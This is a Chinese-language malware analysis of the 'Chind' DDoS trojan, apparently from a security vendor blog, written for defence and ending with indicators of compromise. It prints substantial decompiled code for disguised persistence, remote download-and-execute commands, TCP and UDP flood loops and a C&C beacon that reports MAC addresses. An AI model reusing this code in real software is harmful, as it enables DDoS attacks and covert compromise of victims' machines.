摘要
事件起因:
前一段时间,国外安全网站曝光了一个利用中国受害者主机执行 DDoS 攻击的木马——Chind。该木马在准备发起攻击前,会先检测用户是否安装了 360,如果检测到就会停止攻击。下面对该木马的行为进行详细分析。
木马危害:
该木马长期潜伏在用户电脑中,使用户主机沦为肉鸡,并在发起者指定的时间对指定目标发起 DDoS 攻击。大量肉鸡同时向同一目标发送大量数据,会导致被攻击目标网络瘫痪;而对中招用户来说,一旦被攻击方对攻击事件进行追查,能查到的直接来源就是这些无辜的中招用户。
木马行为分析
0x00 木马基本信息
MD5:5a454c795eccf94bf6213fcc4ee65e6d
加壳情况:UPX -> Markus & Laszlo ver. [ 3.91 ] <- info from file.
基本行为:自我复制,自我删除,开机自启动(注册表或计划任务),联网检测,随时下载并执行最新版本木马,上报本机网卡信息,对指定目标主机发起 TCP/UDP 洪水攻击
0x01 使用**upx**压缩壳减小体积
从压缩前后可以看到体积减小了一半
0x02 创建互斥量,保证只有一个木马在运行
2.1. 使用 Sleep 函数使木马进入短暂休眠(0x2710 = 10000 ms,即 10 秒)。该木马大量使用 Sleep,后面不再逐一说明。在此之前还调用 SetErrorMode(0x8003) 屏蔽系统错误对话框,并通过 SetUnhandledExceptionFilter 安装自己的顶层异常处理函数。
SetErrorMode(0x8003u);   // SEM_FAILCRITICALERRORS | SEM_NOGPFAULTERRORBOX | SEM_NOOPENFILEERRORBOX: no system error dialogs
SetUnhandledExceptionFilter(TopLevelExceptionFilter);   // install the sample's own top-level exception handler
Sleep(0x2710u);   // 10,000 ms = 10 s; the sample sleeps like this throughout
2.2. 创建唯一标识 "Global\3672a9586a5f342b2ca070851e425db6"(全局命名互斥量,可作为该样本的检测特征):
// Single-instance guard: global named mutex, bInitialOwner = TRUE. The caller checks GetLastError() for ERROR_ALREADY_EXISTS (183).
hObject = CreateMutexW(0, 1, L"Global\\3672a9586a5f342b2ca070851e425db6");
0x03 互斥量已存在时的处理
// 183 == ERROR_ALREADY_EXISTS: another instance already holds the mutex, so this copy removes its own file and exits.
if ( hObject && GetLastError() == 183 ){
DleteItSelf();   // "cmd /c del <self>" via ShellExecuteW
TopLevelExceptionFilter(v5);   // decompiler-named; used here as the exit path (v5 is not visible in this excerpt)
}
3.1 CreateMutexW() 返回句柄后,如果 GetLastError() 为 183(ERROR_ALREADY_EXISTS,互斥量已存在,说明已有一个实例在运行),则当前进程会删除自身并退出。删除方式是取得自身路径的短路径名,再通过 %ComSpec%(cmd.exe)执行 "/c del <路径> >> NUL":
if ( GetModuleFileNameW(0, &Filename, 0x104u) )
{
if ( GetShortPathNameW(&Filename, &Filename, 0x104u) )
{
lstrcpyW(&String1, L"/c del ");
lstrcatW(&String1, &Filename);
lstrcatW(&String1, L" >> NUL");
if ( GetEnvironmentVariableW(L"ComSpec", &Filename, 0x104u) )
{
if ( (signed int)ShellExecuteW(0, 0, &Filename, &String1, 0, 0) > 32 )
result = 1;
}
}
3.2进程退出
// Exit path: terminate the current process with exit code 0 (no further cleanup runs).
v0 = GetCurrentProcess();
return TerminateProcess(v0, 0);
0x04 根据当前进程的权限选择路径进行自我复制(CopyFileW 的第三个参数为 0,目标已存在时会被直接覆盖)
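/*
 * Copies the running executable to its persistence location.
 * GetPath() builds the destination path (listed below) and
 * GetModuleFileName() yields this module's own path; both are
 * decompiler-recovered helpers whose bodies are not in this excerpt.
 * Returns CopyFileW's BOOL. bFailIfExists == 0, so an existing copy
 * is silently overwritten.
 *
 * Fix: the two declaration lines had been mangled by the page's
 * markdown extraction ("[ST04_4@1" turned into a mailto link),
 * leaving a syntactically invalid line; restored as plain comments.
 */
BOOL sub_405DF0()
{
WCHAR *v0; // [ST04_4@1]  destination path
WCHAR *v1; // eax@1       source path (this executable)
v0 = GetPath();
v1 = GetModuleFileName();
return CopyFileW(v1, v0, 0);
}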
4.1 获取复制目标路径 GetPath():有管理员权限时为 %WINDIR%\System\Init\wininit.exe,否则为 %APPDATA%\Microsoft\System\wininit.exe(SHGetFolderPathW 的 CSIDL 26 即 CSIDL_APPDATA)。所创建的目录均通过 SetFileAttributesW(…, 2)(FILE_ATTRIBUTE_HIDDEN)设为隐藏,文件名则冒用系统进程 wininit.exe 的名字。
// Pick the drop location by privilege level (judgegrade() presumably tests for admin; its body is not shown here).
if ( judgegrade() )
{
// Elevated: %WINDIR%\System\Init\wininit.exe; the Init directory is marked hidden (2 == FILE_ATTRIBUTE_HIDDEN).
GetWindowsDirectoryW(&FileName, 0x104u);
PathAppendW(&FileName, L"\\System\\");
CreateDirectoryW(&FileName, 0);   // return value unchecked (the directory may already exist)
PathAppendW(&FileName, L"\\Init\\");
CreateDirectoryW(&FileName, 0);
SetFileAttributesW(&FileName, 2u);
PathAppendW(&FileName, L"\\wininit.exe");   // mimics the name of the legitimate Windows wininit.exe
}
// Otherwise CSIDL 26 == CSIDL_APPDATA: %APPDATA%\Microsoft\System\wininit.exe, again inside a hidden directory.
else if ( SHGetFolderPathW(0, 26, 0, 0, &FileName) >= 0 )
{
PathAppendW(&FileName, L"\\Microsoft\\");
CreateDirectoryW(&FileName, 0);
PathAppendW(&FileName, L"\\System\\");
CreateDirectoryW(&FileName, 0);
SetFileAttributesW(&FileName, 2u);
PathAppendW(&FileName, L"\\wininit.exe");
}
4.1.1 判断系统的权限 JudgeGrade()(注:下面列出的代码与 4.1 中 GetPath() 的代码相同,JudgeGrade() 本身的实现并未在本文中给出)
// NOTE(review): this listing repeats GetPath() from 4.1 verbatim; judgegrade()'s own body is not shown on this page.
if ( judgegrade() )
{
// Elevated: %WINDIR%\System\Init\wininit.exe inside a hidden (attribute 2) directory.
GetWindowsDirectoryW(&FileName, 0x104u);
PathAppendW(&FileName, L"\\System\\");
CreateDirectoryW(&FileName, 0);
PathAppendW(&FileName, L"\\Init\\");
CreateDirectoryW(&FileName, 0);
SetFileAttributesW(&FileName, 2u);
PathAppendW(&FileName, L"\\wininit.exe");
}
// Non-elevated: CSIDL_APPDATA (26) -> %APPDATA%\Microsoft\System\wininit.exe.
else if ( SHGetFolderPathW(0, 26, 0, 0, &FileName) >= 0 )
{
PathAppendW(&FileName, L"\\Microsoft\\");
CreateDirectoryW(&FileName, 0);
PathAppendW(&FileName, L"\\System\\");
CreateDirectoryW(&FileName, 0);
SetFileAttributesW(&FileName, 2u);
PathAppendW(&FileName, L"\\wininit.exe");
}
0x05对当前进程权限判断,选择长期驻扎在系统
5.1判断当前进程运行的权限是否是管理员权限(前面已经提到过,不在重复)
5.2如果是管理员权限,则直接写入注册表,开机自启动
5.3如果不是管理员权限,先判断系统版本
5.3.1 如果系统版本是以下版本中的一个,则直接创建注册表自启动项即可(同 5.2)
Windows Vista、Windows Server 2003 R2、Windows Home Server、Windows Server 2003、Windows XP Professional x64 Edition、Windows XP、Windows 2000
5.3.2 如果系统版本不是以上中的一个,则调用 schtasks.exe 创建计划任务,使木马不仅能开机自启动,还能以 SYSTEM 权限运行。注意:以 /ru system 创建计划任务通常要求调用方已经拥有管理员权限,从列出的代码无法确认非管理员进程下这一步是否真的成功。
schtasks.exe 命令行参数解析:
/create /F 创建任务,若同名任务已存在则强制覆盖;/sc onstart 指定任务在系统启动时运行
/tn Microsoft\\Windows\\Shell\\Init 指定任务名为 Microsoft\Windows\Shell\Init(伪装成系统自带的任务名)
/tr \"\\\"%s\\\"\" 指定任务要运行的程序,%s 为木马替身的完整路径
/ru system 指定该任务以 SYSTEM 账户运行
// Build "<System32>\schtasks.exe" and its argument string, then launch it.
GetSystemDirectoryW(&Buffer, 0x104u);
wsprintfW(&File, L"%s\\schtasks.exe", &Buffer);
if ( sub_406400() ){
sub_406030();   // alternate persistence path (registry autorun per the write-up); body not shown here
// NOTE(review): on this path nothing in the visible code sets Parameters before ShellExecuteW below.
} else {
v0 = sub_404CB0();   // presumably the dropped copy's path; fills the %s below
// /create /F (overwrite) /sc onstart (run at boot) /tn Microsoft\Windows\Shell\Init /tr "<path>" /ru system
// NOTE(review): creating a task as SYSTEM normally needs an elevated caller; success when unelevated is not shown here.
wsprintfW( &Parameters,
L"/create /F /sc onstart /tn Microsoft\\Windows\\Shell\\Init /tr \"\\\"%s\\\"\" /ru system",
v0);}
DeleteTask();   // "/delete /TN Microsoft\Windows\Shell\Init /F" first, so /create does not collide with a stale task
Sleep(0x2710u);   // 10 s
return ShellExecuteW(0, L"open", &File, &Parameters, 0, 0);
5.3.3 每次创建任务之前都会先删除同名任务,以保证任务能够成功创建(删除命令同样带 /F 强制参数):
// Remove any existing task of the same name (/F forces). The trailing &Buffer argument is unused: the format has no conversion specifier.
wsprintfW(&Parameters, L"/delete /TN Microsoft\\Windows\\Shell\\Init /F", &Buffer);
return ShellExecuteW(0, L"open", &File, &Parameters, 0, 0);
0x06**创建进程,删除自身**
6.1运行刚刚复制的替身
6.2删除自身(同3.1)
0x07 测试网络是否畅通
如果不畅通,木马会休眠 0x1D4C0 = 120000 ms(2 分钟)后再次尝试;连续失败 30 次(约 1 小时)仍无网络时,木马会调用 ExitProcess 自动退出。
// Connectivity gate: retry TestInter() every 0x1D4C0 ms (120 s); give up and exit after 30 failures (~1 hour).
while ( 1 ){
v10 = TestInter();
if ( v10 )
break;
Sleep(0x1D4C0u);
++v12;   // NOTE(review): v12's initialisation is outside this excerpt
if ( v12 >= 30 )
ExitProcess(0);
}
7.1 用到的测试网址都是常用网站(百度、微软、QQ),最多循环 10 轮,每轮按顺序尝试,任意一个能打开即认为网络畅通:
// Up to 10 rounds; each round tries three high-availability sites in order and returns 1 on the first that opens.
for ( i = 0; i < 10; ++i ){
if ( SetInterConn("http://www.baidu.com/") )
return 1;
if ( SetInterConn("http://www.microsoft.com/") )
return 1;
if ( SetInterConn("http://www.qq.com/") )
return 1;
}
7.1.1 连接设置 SetInterConn():通过 WinINet 打开 URL,连接/发送/接收超时均为 5000 ms,连接重试 5 次,并设置 INTERNET_OPTION_IGNORE_OFFLINE 忽略离线模式;URL 能打开即返回 1
// Probe lpszUrl with WinINet; returns 1 if the URL could be opened, else 0.
v3 = 0;
hInternet = InternetOpenA(&byte_4326BF, 1u, 0, 0, 0);   // byte_4326BF = user-agent string; 1 == INTERNET_OPEN_TYPE_DIRECT
// NOTE(review): hInternet is not checked for NULL before the InternetSetOptionA calls below.
Buffer = 5000;   // 5 s for each timeout
InternetSetOptionA(hInternet, 2u, &Buffer, 4u); //INTERNET_OPTION_CONNECT_TIMEOUT
InternetSetOptionA(hInternet, 5u, &Buffer, 4u); //INTERNET_OPTION_SEND_TIMEOUT
InternetSetOptionA(hInternet, 6u, &Buffer, 4u); //INTERNET_OPTION_RECEIVE_TIMEOUT
Buffer = 5;
InternetSetOptionA(hInternet, 3u, &Buffer, 4u); //INTERNET_OPTION_CONNECT_RETRIES
InternetSetOptionA(hInternet, 0x4Du, 0, 0); //INTERNET_OPTION_IGNORE_OFFLINE (0x4D == 77)
v4 = InternetOpenUrlA(hInternet, lpszUrl, &byte_4326C3, 0, 0, (DWORD_PTR)&dwContext); // byte_4326C3 = extra headers; no flags
if ( v4 )
v3 = 1;   // success means only that the request handle was obtained; the response body is never read
if ( v4 )
InternetCloseHandle(v4);
if ( hInternet )
InternetCloseHandle(hInternet);
return v3;
0x08 根据当前进程的权限决定存放命令文件的目录
8.1判断当前进程是否拥有管理员权限(同4.1.1)
8.2 获取命令文件存放路径:有管理员权限时为 %WINDIR%\Logs\WMI\Event\SystemEvent.evt,否则为 %APPDATA%\Microsoft\System\wow64.dll;文件名分别伪装成日志文件和系统 DLL,所在目录同样被设为隐藏属性
// Path of the encrypted command file, chosen by privilege level; the names mimic a log file / a system DLL.
if ( judgegrade() )
{
// Elevated: %WINDIR%\Logs\WMI\Event\SystemEvent.evt, with Event\ marked hidden (2 == FILE_ATTRIBUTE_HIDDEN).
GetWindowsDirectoryW(&pszPath, 0x104u);
PathAppendW(&pszPath, L"\\Logs\\");
CreateDirectoryW(&pszPath, 0);
PathAppendW(&pszPath, L"\\WMI\\");
CreateDirectoryW(&pszPath, 0);
PathAppendW(&pszPath, L"\\Event\\");
CreateDirectoryW(&pszPath, 0);
SetFileAttributesW(&pszPath, 2u);
PathAppendW(&pszPath, L"\\SystemEvent.evt");
}
// Otherwise CSIDL_APPDATA (26): %APPDATA%\Microsoft\System\wow64.dll, with System\ marked hidden.
else if ( SHGetFolderPathW(0, 26, 0, 0, &pszPath) >= 0 )
{
PathAppendW(&pszPath, L"\\Microsoft\\");
CreateDirectoryW(&pszPath, 0);
PathAppendW(&pszPath, L"\\System\\");
CreateDirectoryW(&pszPath, 0);
SetFileAttributesW(&pszPath, 2u);
PathAppendW(&pszPath, L"\\wow64.dll");
}
// NOTE(review): if pszPath is a stack buffer of this routine the returned pointer dangles; whether it is static is not visible here.
return &pszPath;
0x09 读取并解密命令配置文件
9.1读取命令配置文件
// Read the encrypted command file into lpBuffer; neither the return value nor a short read is checked in this excerpt.
ReadFile(hFile, lpBuffer, nNumberOfBytesToRead, &NumberOfBytesRead, 0);
9.2解密命令配置文件
该文件采用 Salsa20 算法加密。从下面的反编译代码可以看出:轮函数循环结束后,连续 16 次将两个 32 位字相加并按 4 字节间隔写出(共 64 字节的输出块),这与 Salsa20 核心函数最后的 feed-forward 输出步骤一致
while ( v102 );
sub_40BBE0(a1, v6 + v101);
sub_40BBE0(v70 + 4, v7 + v100);
sub_40BBE0(v71 + 8, v8 + v99);
sub_40BBE0(v72 + 12, v9 + v98);
sub_40BBE0(v73 + 16, v97 + v111);
sub_40BBE0(v74 + 20, v96 + v116);
sub_40BBE0(v75 + 24, v95 + v110);
sub_40BBE0(v76 + 28, v94 + v109);
sub_40BBE0(v77 + 32, v93 + v108);
sub_40BBE0(v78 + 36, v92 + v107);
sub_40BBE0(v79 + 40, v91 + v114);
sub_40BBE0(v80 + 44, v90 + v106);
sub_40BBE0(v81 + 48, v89 + v105);
sub_40BBE0(v82 + 52, v88 + v104);
sub_40BBE0(v83 + 56, v87 + v103);
sub_40BBE0(v84 + 60, v86 + v112);
return 0
9.3 对接收到的命令进行相应的操作
该木马能接受的命令如下
update:存储当前的 C&C 地址到一个加密文件并报告给服务器,然后下载并执行最新版的木马,接着删除旧版木马。从代码看,新版本先下载到 %TEMP% 下的临时文件(文件名末尾追加 ".exe",即常量 1702389038 = 0x6578652E),经 sub_405800() 校验通过后用 CreateProcessA 启动,再删除旧版自身。(篇幅有限,只列出部分)
// "update" command: fetch a new build into %TEMP%, start it, then remove this instance.
GetTempPathA(0x104u, &Buffer);
GetTempFileNameA(&Buffer, &byte_4326CB, 0, &TempFileName);   // byte_4326CB = name prefix; uUnique 0 creates the file
DeleteFileA(&TempFileName);   // discard the empty placeholder; only the unique name is kept
v8 = (int)&v11;
do   // inline strlen: advance to the terminating NUL of the string at v11 (which buffer v11 aliases is not visible here)
v9 = *(_BYTE *)(v8++ + 1);
while ( v9 );
v4 = v8;
*(_DWORD *)v8 = 1702389038;   // 0x6578652E == ".exe" in little-endian, appended in place
*(_BYTE *)(v4 + 4) = 0;
DeleteUrlCacheEntryA(lpszUrlName);   // bypass the WinINet cache before and after the fetch
URLDownloadToFileA(0, lpszUrlName, &TempFileName, 0, 0);   // HRESULT not checked
DeleteUrlCacheEntryA(lpszUrlName);
if ( sub_405800(&TempFileName, a3) )   // presumably validates the downloaded file against a3 (body not shown)
{
memset(&StartupInfo, 0, 0x44u);
StartupInfo.cb = 68;   // sizeof(STARTUPINFOA)
ProcessInformation.hProcess = 0;
ProcessInformation.hThread = 0;
ProcessInformation.dwProcessId = 0;
ProcessInformation.dwThreadId = 0;
CloseHandle(hObject);   // presumably releases the single-instance mutex so the new build can start
CreateProcessA(&TempFileName, 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation);
DeleteItself();
TopLevelExceptionFilter();   // exit path (see 0x03)
}
result = DeleteFileA(&TempFileName);   // reached only if validation failed or the process did not exit above
url_exec:从指定的 URL 下载文件到 %TEMP%(文件名同样追加 ".exe"),经 sub_405800() 校验后使用 WinExec 执行该文件
// "url_exec" command: download lpszUrlName into %TEMP% and run it with WinExec (SW_HIDE == 0).
GetTempPathA(0x104u, &Buffer);
GetTempFileNameA(&Buffer, &PrefixString, 0, &TempFileName);
DeleteFileA(&TempFileName);   // keep the unique name, drop the placeholder file
v4 = &v6;
do   // inline strlen to the NUL of the string at v6 (buffer identity not visible here)
v2 = (v4++)[1];
while ( v2 );
*(_DWORD *)v4 = 1702389038;   // 0x6578652E == ".exe", appended in place
v4[4] = 0;
DeleteUrlCacheEntryA(lpszUrlName);   // force a fresh fetch
URLDownloadToFileA(0, lpszUrlName, &TempFileName, 0, 0);   // HRESULT not checked
DeleteUrlCacheEntryA(lpszUrlName);
result = sub_405800(&TempFileName, a2);   // presumably validates the download (body not shown)
if ( result )
result = WinExec(&TempFileName, 0);
0x0A 通过 TCP 或 UDP 发送数据,实现 DDoS 攻击
A.1 TCP 攻击:socket(2, 1, 6) 即 AF_INET/SOCK_STREAM/IPPROTO_TCP。目标地址由 inet_addr(cp) 得到,端口使用指定端口(v10)或随机端口;循环中每次新建一个套接字,connect 后通过 ioctlsocket(…, -2147195266 即 0x8004667E = FIONBIO)设为非阻塞,send 一次数据后 shutdown、closesocket,再进入下一轮——即连接洪水
// TCP flood target: AF_INET (2) sockaddr with the IPv4 from inet_addr(cp); the port is filled in per iteration below.
name.sa_family = 2;
*(_DWORD *)&name.sa_data[2] = inet_addr(cp);
if ( v10 && v11 )
*v11 = 58;   // ':' - v11 presumably points at the host:port separator that was overwritten to split the string
while ( 1 ){
s = socket(2, 1, 6);
if ( v10 ){
*(_WORD *)&name.sa_data[0] = htons(v10);
}
else{
v1 = HandleError();
*(_WORD *)&name.sa_data[0] = htons(v1);
}
connect(s, &name, 16);
argp = 1;
ioctlsocket(s, -2147195266, &argp);
send(s, buf, len, 0);
shutdown(s, 1);
closesocket(s);
A.2 UDP 攻击:socket(2, 2, 17) 即 AF_INET/SOCK_DGRAM/IPPROTO_UDP。每发送 10000(0x2710)个包就用一个随机字节重新填充 0x2000 字节的缓冲区;每个包使用随机目的端口,长度为 4096~8191 字节的随机值,通过 sendto 不断发送(HandleError() 是反编译器给出的名字,从用法看应是取随机数的函数)
result = socket(2, 2, 17);
s = result;
if ( result >= 0 ){
*(_DWORD *)&to.sa_family = 0;
*(_DWORD *)&to.sa_data[2] = 0;
*(_DWORD *)&to.sa_data[6] = 0;
*(_DWORD *)&to.sa_data[10] = 0;
to.sa_family = 2;
*(_DWORD *)&to.sa_data[2] = inet_addr(cp);
while ( 1 ){
v9 = v10++ % 0x2710u;
if ( !v9 ){
v2 = HandleError();
memset(&buf, v2, 0x2000u);
}
v3 = HandleError();
*(_WORD *)&to.sa_data[0] = htons(v3);
len = HandleError() % 4096 + 4096;
sendto(s, &buf, len, 0, &to, 16);
0x0B 再次接受指令
在创建 DoS 攻击线程后,该木马还会继续创建一个线程,到指定的网址下载文件,然后对文件进行解密(M_decode)并执行其中的命令(AcceptOrder)。InternetOpenUrlA 使用的标志 0x4040300 对应 INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_AUTH | INTERNET_FLAG_NO_UI | INTERNET_FLAG_PRAGMA_NOCACHE,下载前还调用 DeleteUrlCacheEntryA,以保证每次都从服务器取到最新命令
// Command-fetch thread: same WinINet setup as SetInterConn (5 s timeouts, 5 retries, ignore offline mode).
hInternet = InternetOpenA(&szAgent, 1u, 0, 0, 0);   // 1 == INTERNET_OPEN_TYPE_DIRECT
Buffer = 5000;
InternetSetOptionA(hInternet, 2u, &Buffer, 4u);   // INTERNET_OPTION_CONNECT_TIMEOUT
InternetSetOptionA(hInternet, 5u, &Buffer, 4u);   // INTERNET_OPTION_SEND_TIMEOUT
InternetSetOptionA(hInternet, 6u, &Buffer, 4u);   // INTERNET_OPTION_RECEIVE_TIMEOUT
Buffer = 5;
InternetSetOptionA(hInternet, 3u, &Buffer, 4u);   // INTERNET_OPTION_CONNECT_RETRIES
InternetSetOptionA(hInternet, 0x4Du, 0, 0);   // INTERNET_OPTION_IGNORE_OFFLINE
DeleteUrlCacheEntryA(lpszUrlName);   // always fetch fresh
// 0x4040300 == NO_CACHE_WRITE | NO_AUTH | NO_UI | PRAGMA_NOCACHE (WinINet INTERNET_FLAG_* values)
hFile = InternetOpenUrlA(hInternet, lpszUrlName, &szHeaders, 0, 0x4040300u, (DWORD_PTR)&dwContext);
if ( hFile ){
v16 = 0;
v3 = About_Expection_badalloc_4(0);
v14 = v3;
do{
while ( !InternetReadFile(hFile, &v18, 0x1000u, &dwNumberOfBytesRead) );
v9 = dwNumberOfBytesRead + v16;
v4 = About_Expection_badalloc_4(dwNumberOfBytesRead + v16);
v10 = v4;
memmove_0(v4, v14, v16);
v5 = v14;
j_j__free(v14);
memmove_0((char *)v10 + v16, &v18, dwNumberOfBytesRead);
v14 = v10;
v16 = v9;
}
while ( dwNumberOfBytesRead );
v12 = M_decode(v14, v16);
if ( v12 ){
v8 = AcceptOrder((int)v12, 0);
v7 = v12;
j_j__free(v12);
}
0x0C**获取网卡信息**
C.1 通过调用 GetAdaptersInfo 函数获取网卡名、MAC、IP、子网掩码、网关等信息。从列出的代码看,上报字符串先写入 "%d_",然后对每个网卡追加 Address 字段的 8 个字节(十六进制);注意 sub_41A958 是 sprintf 类函数,而这里的目标缓冲区 unk_43F1C8 同时又被当作 %s 的参数,源与目标缓冲区重叠
GetAdaptersInfo(&AdapterInfo, &SizePointer);
v3 = &AdapterInfo;
memset(&unk_43F1C8, 0, 0x1000u);
sub_41A958((int)&unk_43F1C8, "%d_", 32);
do{
v4 = v3->Address;
sub_41A958(
(int)&unk_43F1C8,
"%s_%02x%02x%02x%02x%02x%02x%02x%02x",
&unk_43F1C8,
v3->Address[0],
v3->Address[1],
v3->Address[2],
v3->Address[3],
v3->Address[4],
v3->Address[5],
v3->Address[6],
v3->Address[7]);
v3 = v3->Next;
}
C.2 通过调用 InternetOpenUrlA() 将刚刚获取到的本机信息发送至 C&C 服务器:URL 由 a1 和 a2 两段拼接而成,发送前先调用 DeleteUrlCacheEntryA 清除缓存;代码只检查请求是否成功,并不读取响应内容
// Beacon: open <a1><a2> (presumably C2 base URL + query built from the adapter string) and only note whether it succeeded.
hInternet = InternetOpenA(&byte_4326C6, 1u, 0, 0, 0);   // byte_4326C6 = user-agent; INTERNET_OPEN_TYPE_DIRECT
Buffer = 5000;   // 5 s timeouts
InternetSetOptionA(hInternet, 2u, &Buffer, 4u);   // INTERNET_OPTION_CONNECT_TIMEOUT
InternetSetOptionA(hInternet, 5u, &Buffer, 4u);   // INTERNET_OPTION_SEND_TIMEOUT
InternetSetOptionA(hInternet, 6u, &Buffer, 4u);   // INTERNET_OPTION_RECEIVE_TIMEOUT
Buffer = 5;
InternetSetOptionA(hInternet, 3u, &Buffer, 4u);   // INTERNET_OPTION_CONNECT_RETRIES
InternetSetOptionA(hInternet, 0x4Du, 0, 0);   // INTERNET_OPTION_IGNORE_OFFLINE
sub_41A958((int)&szUrlName, "%s%s", a1, a2);   // sprintf-like concatenation; no length bound visible
DeleteUrlCacheEntryA(&szUrlName);   // force a live request
result = InternetOpenUrlA(hInternet, &szUrlName, &byte_4326C7, 0, 0, (DWORD_PTR)&dwContext);
v5 = result;
if ( result )
v4 = 1;   // NOTE(review): v4 is never read in this excerpt; result ends up holding the last InternetCloseHandle return
if ( v5 )
result = (HINTERNET)InternetCloseHandle(v5);
if ( hInternet )
result = (HINTERNET)InternetCloseHandle(hInternet);
现在该网址已经无法访问,因此也取不到返回的数据了。
结论:
安装 360 安全卫士可以查杀该木马;建议安装 360 安全卫士并进行全盘扫描,检查自己是否中招。手工排查时可关注以下特征:互斥量 Global\3672a9586a5f342b2ca070851e425db6,隐藏目录及文件 %WINDIR%\System\Init\wininit.exe 或 %APPDATA%\Microsoft\System\wininit.exe,命令文件 %WINDIR%\Logs\WMI\Event\SystemEvent.evt 或 %APPDATA%\Microsoft\System\wow64.dll,以及名为 Microsoft\Windows\Shell\Init 的计划任务。千万不要一不小心就被别人利用,出了事还得由无辜的群众来承担。
360安全卫士成功扫描